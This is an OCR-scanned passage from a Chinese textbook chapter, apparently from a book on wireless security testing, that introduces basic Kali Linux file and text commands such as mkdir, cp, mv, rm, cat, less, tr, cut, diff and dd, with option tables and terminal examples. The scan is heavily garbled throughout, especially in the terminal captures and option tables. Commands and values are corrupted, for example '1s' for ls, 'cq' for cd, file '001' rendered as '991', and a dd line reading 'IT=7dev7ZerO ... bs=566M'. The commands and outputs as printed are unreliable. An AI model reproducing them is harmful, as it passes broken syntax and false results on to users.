mkdir -p [目录 名 ] 
其 中 ， 参 数 -p 表 示 递 归 创 建 目 录 。 
例如 : 使 用 mkdir 命 令 创建 一 个 名 称 为 
temp 的 目录 ， 输入 的 创建 命令 如 下 : 
mkdir temp 


按 Enter 键 ， 下 图 为 执行 效果 。 


FaatGKRaUI: -# Us 


Documents Music Pubtic Test 
esktop Dounloads Pictures Tenplates Videos 
oot@kali:-# mkdir tenp 
oo0t@kali:-# 1s 

Documents Music Pubtic Templates Videod 
esktop Downloads Pictures temp。 Test 
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例如 : 使 用 mkdir -p 创 建 一 个 名 称 为 
test/001 test/002 的 递归 目录 ， 这 里 输入 的 创 
建 命令 如 下 : 


mkdir -p test/001 test/002 


按 Enter 键 ， 下 图 为 执行 效果 。 


Footekali: ~# mkdir -p Test766IT test7662 
root@kali: 
besktop 
pocu 
root@kali:-# ls test 
Bel 09902 


s Pictures Templates Test 


ocuments Public test Video: 


4.2.3 


rmdir 用 于 删除 空 目录 。 命 令 格式 
如 下 : 

rmdir [目录 名 ] 

例如 : 这 里 删除 一 个 名 称 为 001 空 目 
录 ， 这 里 输入 的 删除 空 目录 命令 如 下 : 

rmdir 001 


按 Enter 键 ， 下 图 为 执行 效果 。 


root@kali:~# cd test 
root@kali:~/test# ls 
pel 902 


rmdir 


root@kali:~/test# rmdir 991 
Iroot@kali:-/test# ls 
B92 

4.2.4 cd 


cd 命令 用 于 切换 当前 工作 目录 至 
dirName (目录 参数 ) 。 其 中 dirName 表 示 


第 4 章 


法 可 为 绝对 路 径 或 相对 路 径 。 若 目录 名 称 
省 略 ， 则 变换 至 使 用 者 的 home 目 录 ， 也 就 
是 刚 登 录 时 所 在 的 目录 。 命 令 格式 如 下 : 

cq [目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 ”cd 命令 参数 介绍 

选 项 含 义 

~ 表示 为 home 目 录 
表示 目前 所 在 的 目录 
表示 目前 目录 位 置 的 上 一 层 目 录 


如 果 要 切换 到 的 目标 目录 是 一 个 符号 链 
卫 | 接 ， 直 接 切换 到 符号 链接 指向 的 目标 目录 


如 果 要 切换 的 目标 目录 是 一 个 符号 的 链 
工 接 ， 直 接 切换 到 字符 链接 名 代表 的 目录 ， 
而 非 符号 链接 所 指向 的 目标 目录 


当 仅 使 用 “-” 一 个 选项 时 ， 当 前 工作 目 
录 将 被 切换 到 环境 变量 OLDPWD 所 表示 的 
目录 

使 用 cd 加 上 目录 名 称 可 以 切换 到 相应 
的 目录 ， 例 如 ， 使 用 cd ~ 可 以 切换 到 当前 用 
户 的 主 目录 ， 如 下 图 所 示 。 


Footorati:# pud 
root 


‘oot@kali:~# cd /hone 
‘oot@kali:/home# cd ~ 
Foot@kali: ~# pwd 
root 


如 果 使 用 cd 加 上 绝对 路 径 可 以 直接 切 
换 到 相应 的 目录 ， 每 加 入 “..” 可 以 退出 一 
层 ， 如 下 图 所 示 。 


hee # cd /usr/share/john 
oot@kali:/usr/share/iohn# cd ../../.j 


4.2.5 pwd 


pwd 命 令 以 绝对 路 径 的 方式 显示 用 户 当 
前 工作 目录 。 命 令 将 当前 目录 的 全 路 径 名 
称 〈 从 根 目录 ) 写 入 标准 输出 。 全 部 目录 
使 用 “/” 分 隔 。 第 一 个 /表示 根 目 录 ， 最 后 
一 个 目录 是 当前 目录 。 执 行 pwd 命 令 可 立刻 
获取 当前 用 户 所 在 的 工作 目录 的 绝对 路 径 
名 称 。 命 令 格式 如 下 : 


pwd 


例如 : 使 用 pwd 命 令 ， 可 以 显示 出 当前 


熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


目录 ， 该 命令 比较 简单 也 没有 选项 ， 下 图 
为 运行 命令 后 的 显示 结果 。 


root@kali:~# Ls 
besktop Downloads 
Documents Music 
Iroot@kali:-# pwd 
root 


Pictures Templates Test 
Public test Videos| 


侈 提示 : 为 了 区 分 目录 信息 ， 可 以 先 使 用 ls 
列 出 目录 信息 。 


4.2.6 cp 
cp 命令 主要 用 于 复制 文件 或 目录 。 命 音 
令 语法 格式 如 下 : 
cp -rp [原文 件 或 目录 ] [目标 目录 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 cp 命令 参数 介绍 
从”: 洲 


此 选项 通常 在 复制 目录 时 使 用 ， 它 保留 
链接 、 文 件 属性 ， 并 复制 目录 下 的 所 有 
内 容 。 其 作用 等 于 dpR 选 项 组 合 


复制 时 保留 链接 。 这 里 所 说 的 链接 相当 
于 Windows 系 统 中 的 快捷 方式 


覆盖 已 经 存在 的 目标 文件 而 不 给 出 提示 


与 -选项 相反 ， 在 覆盖 目标 文件 之 前 给 出 
提示 ， 要 求 用 户 确认 是 否 覆 盖 ， 回 答 y 时 
目标 文件 将 被 覆盖 


除 复制 文件 的 内 容 外 ， 还 把 修改 时 间 和 
访问 权限 也 复制 到 新 文件 中 


若 给 出 的 源 文 件 是 一 个 目录 文件 ， 此 时 
将 复制 该 目录 下 所 有 的 子 目 录 和 文件 


不 复制 文件 ， 只 是 生成 链接 文件 


例如 : 使 用 cp 命令 加 -r 选 项 复制 目录 到 ” 
指定 目录 ， 下 图 为 执行 效果 。 


Test temp 
IrootEkali:-# Ls temp 
1 


Jroot@kali: ~# cp -rr 


例如 : 使 用 cp 命令 ,复制 文件 到 目 
录 ， 下 图 为 执行 效果 。 
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ctures temp Test 
Public Templates Videos 


aatGRaUI:- 基 TOUCF O01 txt 
oote@kati:-# ls 
Desktop Downloads Pi 
961.txt Documents Music 
‘oot@kali:-# cp 991.txt temp 
‘oot@kali:-# ls tenp 

tTest 


mv 命令 用 来 对 文件 或 目录 重新 命名 ， 
或 者 将 文件 从 一 个 目录 移 到 另 一 个 目录 
中 。source 表 示 源 文件 或 目录 ，target 表 示 目 
标 文件 或 目录 。 如 果 将 一 个 文件 移 到 一 个 
已 经 存在 的 目标 文件 中 ， 则 目标 文件 的 内 
容 将 被 覆盖 。 命 令 语 法 格式 如 下 : 

mv[ 原 文件 或 目录 ] [目标 目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 mv 命令 参数 介绍 


若 指定 目录 已 有 同名 文件 ， 则 先 询问 是 
否 覆 盖 旧 文件 


在 mv 操作 要 覆盖 某 已 有 的 目标 文件 时 不 
给 任何 指示 

使 用 mv 命令 将 源 文件 被 移 至 目标 文件 
有 以 下 两 种 不 同 的 结果 : 

e 如 果 目 标 文件 是 到 某 一 目录 文件 的 
路 径 ， 源 文件 会 被 移 到 此 目录 下 ， 
且 文 件 名 不 变 。 如 果 目 标 文件 不 是 
目录 文件 ， 则 源 文件 名 (只 能 有 一 
个 ) 会 变 为 此 目标 文件 名 ， 并 覆盖 
已 经 存在 的 同名 文件 。 

e 如 果 源 文件 和 目标 文件 在 同一 个 目 
录 下 ，mv 的 作用 就 是 改 文件 名 。 当 
目标 文件 是 目录 文件 时 ， 源 文件 或 
目录 参数 可 以 有 多 个 ， 则 所 有 的 源 
文件 都 会 被 移 至 目标 文件 中 。 所 有 
移 到 该 目录 下 的 文件 都 将 保留 以 前 
的 文件 名 。 


移 注 意 : mv 命令 与 cp 命令 的 执行 效果 不 
同 ，mv 的 作用 是 剪 切 ， 文 件 个 数 并 未 增 
加 。 而 cp 对 文件 进行 复制 ， 文 件 个 数 增 
加 了 。 


mv 命令 ， 将 其 中 一 个 目录 剪 切 走 ， 下 图 为 
运行 效果 。 


root@kali:-# TS test 
pez 


root@kati:-# LS Test 

2 3 4 port Service test 
root@kali:-# mv test/992 Test 
root@kali:-# ls Test 

Bez 2 3 4 port Service test 
root@kali:~# ls test 

Iroot@kali: ~# 


例如 : 使 用 mv 命令 对 文件 进行 重 命 
名 ， 下 图 为 执行 效果 。 


root@kali:~/temp# Ls 
6861.txt Test | 
Iroot@kali:-~/temp# mv 601.txt 992.txtl 
Iroot@kali:~/temp# ls | 
B92.txt Test 


4.2.8 rm 


rm 命令 用 于 删除 一 个 文件 或 者 目录 。 
命令 语法 格式 如 下 : 

rm -f [文件 或 目录 ] 

命令 中 选项 的 参数 介绍 见 下 表 。 
表 rm 命令 参数 介绍 

含义 

删除 前 逐一 询问 确认 
即使 源 文件 为 只 读 属性 ， 也 直接 删除 ， 
不 确认 
将 目录 及 以 下 文件 递归 删除 


例如 : 使 用 mm 命令 加 上 -i 选 项 ， 在 删除 
文件 时 会 进行 询问 ， 下 图 为 执行 效果 。 

root@kali:~/temp# touch 001.txt 
root@kali:~/temp# ls 
8601.txt Test 
root@kali:~/temp# rm -i 001.txt 
rm: 是 否 删 除 普通 空 文件 '991.txt' ? y 
root@kali:~/temp# ls 
Test 


例如 : 如 果 使 用 rm 命令 -r 选 项 会 递归 
删除 ， 该 命令 初学 者 使 用 时 需要 慎重 ， 否 
则 可 能 误 删除 比较 重要 的 文件 导致 系统 崩 
溃 ， 下 图 为 递归 删除 目录 的 执行 效果 。 


Foote@kali:-# mv Test7667 test 

root@kali:-# rm test 

rm: 无 法 删除 'test': 是 一 个 目录 

root@kali:-# rm -r test 
|rootekati:-# ls 

besktop Documents 
Public Templates 


Downloads Music Pictured 
Test Videos 


例如 : 首先 查看 两 个 目录 ， 然 后 使 用 
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4.3 ”文件 内 容 查看 命令 


文件 内 容 查看 命令 可 以 方便 对 文件 内 
容 进 行 查看 ，Kali Linux 给 出 了 丰富 的 文件 
命令 ， 通 过 这 些 命令 可 以 快速 地 查看 
想 要 的 文件 信息 。Kali Linux 中 文件 内 容 查 
看 命令 见 下 表 
表 Kali Linux 中 文件 查看 命令 


命 令 功 能 

cat 由 第 一 行 开始 显示 文件 内 容 

tac 从 最 后 一 行 开始 显示 ， 与 cat 功 能 相反 
nl 显示 内 容 时 ， 输 出 内 容 的 行 号 

more 一 页 一 页 地 显示 文件 内 容 

head 只 看 头 几 行 

tail 只 看 末尾 几 行 

less 与 more 类 似 ， 但 可 以 往 前 翻 页 
4.3.1 cat 


cat 命 令 用 于 连接 文件 并 打印 到 标准 输 
出 设备 上 ，Kali Linux 系 统 中 有 多 个 用 于 查 
看 文本 内 容 的 命令 ， 每 个 命令 都 有 自己 的 特 
点 ， 例 如 : 这 个 cat 命 令 就 是 用 于 查看 内 容 
较 少 的 纯 文本 文件 的 。 命 令 语法 格式 如 下 : 


cat [-AbEnTv] [文件 名 ] 


悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 一 


root@kali:-# cat -n /etc/issue 
1 Kali GNU/Linux Rolling \n \1 
2 


root@kali:-~# cat /etc/issue 
Kali GNU/Linux Rolling \n \L 


4.3.2 tac 


tac 与 cat 命 令 刚 好 相反 ， 文 件 内 容 从 鱼 
最 后 一 行 开 始 显示 ， 可 以 看 出 tac 是 cat 的 
倒 着 写 。 

tac [-AbEnTv] [文件 名 ] 


为 了 对 比 tac 与 cat 命 令 的 区 别 ， 这 里 使 
用 tac 命 令 查看 与 cat 命 令 一 样 的 文件 ， 下 图 为 
执行 效果 ， 可 以 看 到 cat 显 示 一 行文 本 一 行 空 
白 ，tac 先 显示 一 行 空白 再 显示 文本 。 


Foot@kali: -~# cat /etc/issue 
Kali GNU/Linux Rolling \n \1 


root@kali:-# tac /etc/issue 


Kali GNU/Linux Rolling \n NA1 


4.3.3 more 

使 用 more 命 令 可 以 一 页 一 页 地 翻 看 文昌 
本 内 容 ， 并 在 最 下 面 使 用 百分比 的 形式 来 8 
提示 已 经 阅读 了 多 少 内 容 。 命 令 语法 格式 
如 下 : 


more [-dlfpcsu] 
[+linenum] [文件 名 ] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 more 命 令 参数 介绍 
全 过 


[-num] [+/pattern] 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”cat 命令 参数 介绍 
选 项 含义 
六 相当 于 -VET 的 整合 选项 ， 可 列 出 一 些 特 
殊 字符 而 不 是 空白 而 已 
品 列 出 行 号 ， 仅 针对 非 空白 行 作 行 号 显 
示 ， 空 白 行 不 标 行 号 
-E 将 结尾 的 断 行 字 节 $ 显 示 出 来 
六 列 印 出 行 号 ， 连 同 空白 行 也 会 有 行 号 ， 
与 -b 的 选项 不 同 
< 将 Tab 按 键 以 气 显示 出 来 
Vv 列 出 一 些 看 不 出 来 的 特殊 字符 
这 个 命令 比较 简单 用 于 显示 内 容 ， 加 
入 -选项 可 以 实现 带 行 号 输出 ， 右 上 图 为 运 


行 实例 。 


从 第 n 行 开始 显示 
定义 屏幕 大 小 为 n 行 


在 每 个 档案 显示 前 搜寻 该 字 串 (pat- 
然后 从 该 字 串 前 两 行 之 后 开始 显示 


从 顶部 清 屏 ， 然 后 显示 
提示 按 空格 键 继续 ， 按 Q 键 退出 ， 禁 用 响 
铃 功能 

忽略 CtrlHL ( 换 页 ) 字符 

通过 清除 窗口 而 不 是 滚屏 来 对 文件 进行 换 
页 ， 与 -选项 相似 

把 连续 的 多 个 空 行 显示 为 一 行 

把 文件 内 容 中 的 下 画 线 去 掉 


tem) ， 
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时 4.3.4 


例如 : 使 用 more 命 令 查 看 文本 全 部 内 
容 ， 下 图 为 执行 效果 。 


表 


less 命 令 参数 介绍 


选 项 含义 
ES 
Note ae | | 也 < 缓 冲 区 大 小 > | 设置 缓冲 区 的 大 小 
ees oot er ord nes laos Ss 
ee ler 区 当 文件 显示 结束 后 ， 自 动 离开 
人 
A 
ee 这 强迫 打开 特殊 文件 ， 例 如 外 围 设 
号 vg | 备 代号 、 目 录 和 二 进 制 文件 
ee I 
2 pt 二 只 标志 最 后 搜索 的 关键 词 
和 
区 忽略 搜索 时 的 大 小 写 
人 
。 和 ER 二 a 
2 > = lb 局 
般 情 况 下 ， 一 页 并 不 能 显示 文本 ee 
的 全 部 内 容 ， 这 时 就 可 以 使 用 下 面 的 按键 
来 查看 未 显示 的 内 容 ， 常 用 的 按键 说 明 见 。 -< 文件 名 > epi i 
下 表 。 
- 不 使 用 警告 音 
表 常用 的 按键 说 明 a dis 
因 显示 连续 空 行为 一 行 
按键 功 能 
’s 行 过 长 时 间 将 超出 部 分 舍弃 


空白 键 (space) | 代表 向 下 翻 一 页 


Enter 


代表 向 下 翻 一 行 


代表 在 这 个 显示 的 内 容 当 中 ， 向 下 
搜寻 “ 字 串 ”这 个 关键 字 


立刻 显示 出 文件 名 以 及 目前 显示 的 


2 行 数 

CtHtF 向 下 滚动 一 屏 

= 输出 当前 行 的 行 号 

入 调用 vi 编辑 器 

! 命 令 调用 Shell， 并 执行 命令 

Q 退出 more， 不 再 显示 该 文件 内 容 


less 


less 与 more 类 似 ， 但 使 用 less 可 以 随意 


浏览 文件 ， 而 more 仅 能 向 前 移动 ， 却 不 能 


向 后 移动 ， 而 且 less 在 查看 之 前 不 会 加 载 整 
个 文件 。 命 令 语法 格式 如 下 : 

[文件 名 ] 

命令 中 选项 的 参数 介绍 见 右 表 。 


less 
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将 tab 键 显示 为 规定 的 数字 空格 
向 下 搜索 “字符 串 ” 的 功能 


向 上 搜索 “字符 串 ” 的 功能 


n 重复 前 一 个 搜索 
N 反 向 重复 前 一 个 搜索 
b 向 后 翻 一 页 

d 向 后 翻 半 页 

h 显示 帮助 界面 
Q 退出 less 命 令 

u 向 前 滚动 半 页 
y 向 前 滚动 一 行 
空格 键 滚动 一 页 
Enter 键 滚动 一 行 
PageDown 向 下 翻动 一 页 
PageUp 向 上 翻动 一 页 


例如 : 使 用 less 查 看 文本 内 容 ， 下 图 为 


执行 效果 。 


第 4 章 ”熟悉 无 线 网 络 安全 测试 平台 一 一 Kali Linux 系 统 的 基本 操作 


T7ep TCP ParE service mattiprexen 


18/tcp # nessage send protocol 


22/tcp # SSH Renote Login Protocol 


4.3.5 head 


head 命 令 用 于 查看 纯 文本 文档 的 前 n 
行 ， 命令 语法 格式 如 下 : 
[文件 名 ] 

命令 中 选项 的 参数 为 -n， 用 于 指定 
行 数 。 

使 用 该 命令 可 以 设 定 显示 部 分 内 容 ， 
内 容 从 头 开始 -n 选 项 指定 截止 行 数 ， 例 如 : 
查看 一 个 文本 的 前 5 行 ， 运 行 head 命 令 ， 下 
图 为 执行 效果 。 


head 


4.3.6 tail 


tail 命 令 用 于 查看 文本 末尾 内 容 ， 与 
head 命 令 正好 相反 ， 命 令 语法 格式 如 下 : 
[文件 名 ] 

命令 中 选项 的 参数 为 -n 与 -f， 其 中 -n 用 
于 指定 行 数 ，-f 动 态 显示 文件 末尾 内 容 。 

tail 命 令 多 用 于 查看 日 志文 件 ， 因 为 日 
志文 件 是 变动 的 且 日 志 都 依次 从 尾部 加 入 ， 
例如 : 运行 tail -n 5 /etc/services 命 令 来 查看 文 
件 末 尾 内 容 ， 下 图 为 执行 效果 。 


[Foora UL Tal -TS Jete/services 
57089/tcp 


tail 


er 4 berachabte IRC Proxy 
rie 56581774tcp Pdaonet ee Over Eined 
fido 69179/tcp # fidonet EMSI over TCP 


4.4 其 他 文件 操作 命令 


除了 查看 文件 内 容 命令 外 ，Kali Linux 
还 提供 了 一 些 其 他 的 文件 操作 命令 ， 使 用 


这 些 命令 可 以 过 滤 转 化 文本 中 的 字符 。Kali 
Linux 中 其 他 文件 操作 命令 见 下 表 。 
表 Kali Linux 中 其 他 文件 操作 命令 


命 令 功 能 
t 转换 或 删除 文件 中 的 字符 
we 统计 文本 的 行 数 、 字 数 、 字 节 数 等 
diff 比较 文件 的 差异 
file 查看 文件 类 型 
cut 截取 文本 中 想 要 的 内 容 
stat 查看 文件 的 存储 信息 和 时 间 等 信息 
dd 读 取 、 转 换 并 输出 数据 
4.4.1 tr 


Kali Linux 系 统 中 的 tr 命令 用 于 转换 或 剖 


删除 文件 中 的 字符 ，tr 指 令 从 标准 输入 设备 
读 取 数 据 ， 经 过 字符 串 转译 后 ， 将 结果 输 
出 到 标准 输出 设备 。 命 令 语法 格式 如 下 : 

tr [-cdst][--help][--version] [第 一 字 
符 集 ] [第 二 字符 集 ] 

tr [OPTION]**SET]1 [SET2] 

命令 中 选项 的 参数 介绍 见 下 表 。 

表 tr 命令 参数 介绍 


选 含 义 
< 反选 设 定 的 字符 
-d 删除 指令 字符 
-Ss 缩减 连续 重复 的 字符 成 指定 的 单个 字符 
EE 削减 SET1 指 定 范围 ， 使 之 与 SET2 设 定 
长 度 相等 
--help 显示 程序 用 法 信息 
--Version 显示 程序 本 身 的 版 本 信息 


有 时 想 要 快速 地 蔡 换文 本 中 的 一 些 词 
汇 ， 又 或 者 把 整个 文本 内 容 都 进行 蔡 换 ， 
如 果 进 行 手工 蔡 换 工作 量 太 大 。 这 时 就 可 
以 先 使 用 cat 命 令 读 取 待 处 理 的 文本 ， 然 后 
通过 管道 符 “|”， 把 这 些 文本 内 容 传递 给 tr 
命令 ,最 后 进行 蔡 换 操作 即 可 。 

例如 : 使 用 tr 对 文本 内 容 进 行 大 小 写 转 
换 ， 下 图 为 命令 执行 效果 。 


$1 
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Foot@kali:~/temp# vi O001.txt 

Footerat!: -~/temp# cat 991.txt 

ello linux 

root@kali:~/temp# cat 991.txt | tr a-z A-Z 
HELLO LINUX 


4.4.2 Wc 


中 Kali Linux 系 统 中 的 wc 命 令 用 于 统计 文 
本 的 行 数 、 字 数 、 字 节 数 等 。 命 令 语法 格 


式 如 下 : 
wc [-clw] [--help] [--version] [文件 . . .] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 trs 命 令 参数 介绍 
选 项 含义 
< 只 显示 Bytes 数 
-1 只 显示 行 数 
-Ww 只 显示 字数 


例如 : 使 用 wc 命令 查看 文本 中 的 行 数 
字数 ， 下 图 为 命令 执行 效果 。 

区 本 本 全 temp# cat O601.txt | wc -9 

root@kali: temp# cat 901.txt |wc -1L 


1 
ootekali: temp# cat O01.txt |wc -w 


浊 4.4.3 cut 


在 Kali Linux 系 统 中 ， 如 何 准 确 地 提 
咏 取 出 最 想 要 的 数据 ， 这 也 是 用 户 应 该 重点 
学 习 的 内 容 。 一 般 情 况 下 ， 按 基于 “ 行 ” 
“的 方式 来 提取 数据 是 比较 简单 的 ， 只 要 
设置 好 要 搜索 的 关键 词 即 可 。 但 是 如 果 按 
“ 列 ” 搜 索 文 本 ,不仅 要 使 用 -f 选 项 来 设 
置 需要 看 的 列 数 ， 还 需要 使 用 -d 选 项 来 设 
置 间隔 符号 。 不 过 ， 使 用 cut 命 令 则 可 以 快 
速 截取 文本 中 想 要 的 内 容 。 命 令 语 法 格式 
如 下 : 
cut [-bn] [file] 


eat [=el [Rkel 
cut [-df] [file] 


命令 中 选项 的 参数 介绍 见 下 表 。 


$2 


表 trs 命 令 参数 介绍 


选 项 含义 
b 以 字 节 为 单位 进行 分 割 
< 以 字符 为 单位 进行 分 割 
-d 自 定义 分 隔 符 ， 默 认为 制 表 符 
f 与 -d 一 起 使 用 ， 指 定 显示 哪个 区 域 
1 取消 分 割 多 字 节 字符 


侈 提示 : cut 命 令 从 文件 的 每 一 行 剪 切 字 
节 、 字 符 和 字段 并 将 这 些 字 节 、 字 符 和 字 
段 写 至 标准 输出 。 如 果 不 指定 文件 参数 ， 
cut 命 令 将 读 取 标准 输入 ， 不过， 必须 指 
定 -b、-c 或 -标志 之 一 。 


例如 : 使 用 cut 截 取 部 分 内 容 进 行 显 
示 ， 下 图 为 命令 执行 效果 。 


root@kali:—/temp# cat O01.txt 
91:xiaoming:75:390:55:609 
6892:zhangsan:890:99:166:88 
root@kali:~/temp# cut -d":" -f2 991.txtl 
xiaoming 

zhangsan 


例如 : 使 用 cat 读 取 文 件 再 使 用 cut 进 行 
截取 某 段 内 容 ， 下 图 为 命令 执行 效果 。 


root@kali:~/temp# cat O01.txt 


601:xiaoming:75:30:55:60 
992:zhangsan:80:99:160:88 
Iroot@kali:~/temp# cat 991.txt | cut -d":”-f3， 
75:309 
86:99 


4.4.4 stat 


Kali Linux 系 统 中 的 stat 命 令 可 以 用 于 查看 
文件 的 存储 信息 和 时 间 等 信息 ， 会 显示 出 文 
件 的 三 种 时 间 状 态 : 最 近 访 问 (Access) 、 
更 改 (Modify) 、 改 动 (Change) 。 命 令 
语法 格式 如 下 : 

stat [文件 或 目录 ] 


例如 : 使 用 stat 可 以 查看 文件 详细 时 
间 ， 下 图 为 命令 执行 效果 。 


| 


块 :8 I0 决 ;4996 ”共通 文件 
Inode : 3548922 。。 磊 链 接 : 1 

( /root) 6id:( 8/ root 
884530107 -8486 


7:37.848539246 -8488 
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4.4.5 diff 


Kali Linux 系 统 中 的 di 全 命令 用 于 比较 文件 的 差异 ，dif 以 逐 行 的 方式 ， 比较 文本 文件 的 
异同 处 ， 如 果 指 定 要 比较 目录 ， 则 diff 会 比较 目录 中 相同 文件 名 的 文件 ， 但 不 会 比较 其 中 


的 子 目 录 。 命 令 语法 格式 如 下 : 


diff [选项 ] 文件 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 diff 命 令 参数 介绍 
选 项 含 义 

-< 行 数 > 指定 要 显示 多 少 行 的 文本 。 此 参数 必须 与 -或 -u 参 数 一 并 使 用 
-a 或 --text di 人 ff 预 设 只 会 逐 行 比较 文本 文件 
-b 或 --ignore-space-change 不 检查 空格 字符 的 不 同 
-B 或 --ignore-blank-lines 不 检查 空白 行 


-< 
-C< 行 数 > 或 --context< 行 数 > 

-d 或 -minimal 

-D< 巨 集 名称 > 或 ifdef< 巨 集 名 称 > 

-6 或 -ed 

-f 或 -forward-ed 

-了 或 --speed-large-files 

-< 字符 或 字符 串 > 或 --ignore-matching- 


显示 全 部 内 文 ， 并 标 出 不 同 之 处 

与 执行 “-c-< 行 数 >” 指 令 相同 

使 用 不 同 的 演算 法 ， 以 较 小 的 单位 来 做 比较 

此 参数 的 输出 格式 可 用 于 前 置 处 理 器 巨 集 

此 参数 的 输出 格式 可 用 于 ed 的 script 文 件 

输出 的 格式 类 似 ed 的 script 文 件 ， 但 按照 原来 文件 的 顺序 来 显示 不 同 处 
比较 大 文件 时 ， 可 加 快速 度 

若 两 个 文件 在 某 几 行 有 所 不 同 ， 而 这 几 行 同时 都 包含 了 选项 中 指定 的 


lines< 字 符 或 字符 串 > 字符 或 字符 串 ， 则 不 显示 这 两 个 文件 的 差异 

- 越 -ignore-case 不 检查 大 小 写 的 不 同 

J 或 -paginate 将 结果 交 由 pr 程序 来 分 页 

-或 -es 将 比较 结果 以 RCS 的 格式 来 显示 

或 -new-fle 在 比较 目录 时 ， 若 文件 A 仅 出 现在 某 个 目录 中 ， 预 设 会 显示 
Only in 目录 文件 A 若 使 用 -N 参 数 ， 则 dif 会 将 文件 A 与 一 个 空白 的 文件 比较 


Pp: 


车 比较 的 文件 为 C 语 言 的 程序 码 文件 时 ， 显 示 差异 所 在 的 函数 名 称 


-P 或 --unidirectional-new-file 


-q 或 --brief 


-I 或 --recursive 


与 -N 类 似 ， 但 只 有 当 第 二 个 目录 包含 了 一 个 第 一 个 目录 所 没有 的 文件 
时 ， 才 会 将 这 个 文件 与 空白 的 文件 做 比较 


仅 显示 有 无 差异 ， 不 显示 详细 的 信息 
比较 子 目 录 中 的 文件 


-s 或 --report-identical-files 


若 没 有 发 现任 何 差异 ， 仍 然 显示 信息 


-S< 文 件 > 或 --starting-fle< 文 件 > 


在 比较 目录 时 ， 从 指定 的 文件 开始 比较 


-t 或 --expand-tabs 


在 输出 时 ， 将 tab 字 符 展开 
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选 项 


续 表 


含义 


-I 或 --initial-tab 


在 每 行 前 面 加 上 tab 字 符 以 便 对 齐 


-0.-U< 列 数 > 或 --unified=< 列 数 > 


以 合并 的 方式 来 显示 文件 内 容 的 不 同 


-Vv 或 --version 


显示 版 本 信息 


-Ww 或 --ignore-all-space 


忽略 全 部 的 空格 字符 


-W< 宽 度 > 或 --width< 宽 度 > 


在 使 用 -y 参 数 时 ， 指 定 栏 宽 


-x< 文 件 名 或 目录 > 或 --exclude< 文 件 名 或 
目录 > 


不 比较 选项 中 所 指定 的 文件 或 目录 


-X< 文 件 > 或 --exclude-from< 文 件 > 人 


可 以 将 文件 或 目录 类 型 存 成 文本 文件 ， 然 后 在 =< 文 件 > 中 指定 此 文本 


-y 或 --side-by-side 


--help 显示 帮助 


--left-column 该 行内 容 


--suppress-common-lines 


例如 : 使 用 diff 只 比较 两 个 文件 是 否 存 
在 差异 ， 下 图 为 命令 执行 效果 。 


root@kali: 
ello linux 
123456789 
root@kali: 
ello linux 
876543219 
root@kali:~/temp# diff --brief a.txt b.txt 
件 a,txt 和 b.txt 不 同 


例如 : 使 用 di 比较 两 个 文件 并 打印 出 
不 同 部 分 ， 下 图 为 命令 执行 效果 。 


root@kali: 
Pr** a.txt 
-- b.txt 
0 
ery 1,2 w+ 


Temp# cat a.txt 


temp# cat b.txt 


temp# diff -c a.txt b.txt 
2918-11-91 95:28:29.521628618 -0499 
2918-11-91 95:28:54.396922947 -946g 


hello linux 
! 9123456789 
se M2 ass 
hello linux 
! 9876543219 


Kali Linux 系 统 中 的 dd 命令 用 于 读 取 、 


中 读 取 数 据 ， 根 据 指定 的 格式 来 转换 数 
” 据 ， 再 输出 到 文件 、 设 备 或 标准 输出 。 命 
令 语法 格式 如 下 : 


dq [选项 ] 


54 


以 并 列 的 方式 显示 文件 的 异同 之 处 


在 使 用 -y 参 数 时 ， 若 两 个 文件 某 一 行内 容 相同 ， 则 仅 在 左 侧 的 栏 位 显示 


在 使 用 -y 参 数 时 ， 仅 显示 不 同 之 处 


命令 中 选项 的 参数 介绍 见 下 表 。 
表 dd 命令 参数 介绍 
选 项 含 义 
if=file 从 file 中 读 而 不 是 标准 输入 
写 到 file 里 去 而 不 是 标准 输出 。 除 非 指定 
of-file conv=notrunc， 否 则 dd 将 把 file 截 为 0 字 节 
(或 由 seek= 选 项 指定 的 大 小 ) 
es 一 次 读 和 写 bytes 字 节 。 这 将 覆盖 ibs 和 obs 
ys | 设 定 的 值 
Count 设置 要 复制 块 的 个 数 


例如 : 使 用 dd 命令 从 /dev/zero 设 备 文件 
中 取出 一 个 大 小 为 560MB 的 数据 块 ， 然 后 保 
存 成 名 为 560_file 的 文件 ， 下 图 为 执行 效果 。 


Footekali: ~/tenp# dd IT=7dev7ZerO of=560 tile count=1 bs=566M 
记录 了 1+6 的 恋人 入 
记录 了 1+6 的 写 出 
587262566 bytes (587 MB，569 MiB) copied，8.11638 s, 72.3 MB/ 


4.4.7 file 


在 Kali Linux 系 统 中 ， 由 于 文本 、 目 
录 、 设 备 等 所 有 这 些 一 切 都 统称 为 文件 ， 
单 凭 后缀 无 法 确定 具体 的 文件 类 型 ， 这 时 
便 可 以 使 用 file 命 令 来 查看 文件 类 型 。 命 令 
语法 格式 如 下 : 
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file [文件 名 ] 
命令 中 选项 的 参数 介绍 见 下 表 。 
表 ”file 命 令 参数 介绍 


选 项 含义 
-b 列 出 辨识 结果 时 ， 不 显示 文件 名 称 
C 详细 显示 指令 执行 过 程 ， 便 于 排 错 或 分 析 程 序 执行 的 情形 
-名称 文件 > 长 和 其 内 容 有 一 个 或 多 个 文件 名 称 时 ， 让 file 依 序 辨识 这 些 文件 ， 格 式 为 每 列 
个 文件 名 称 
工 直接 显示 符号 连接 所 指向 的 文件 的 类 别 
-m< 文 件 1: 文件 2> 可 以 是 单个 文件 ， 也 可 以 是 用 冒号 分 开 的 多 个 文件 
-V 显示 版 本 信息 
-z 尝试 去 解读 压缩 文件 的 内 容 
[文件 或 目录 …] 要 确定 类 型 的 文件 列表 ， 多 个 文件 之 间 使 用 空格 分 开 ， 可 以 使 用 shell 通 配 符 匹 配 多 个 文件 


例如 : 使 用 file 命 令 查看 文件 类 型 ， 下 加 安全 ， 也 可 以 避免 很 多 误 操 作 。 
图 为 命令 执行 效果 。 


FootOKalL: /Test/2# TS 
Bddr arpingl.sh arping2.sh scan.sh scapyl.py scapy2.pyl 


4.5.1 chmod 


eet ee /en fee ASCII text executable Kali Linux/Unix 的 文件 调用 权限 分 为 三 外史 
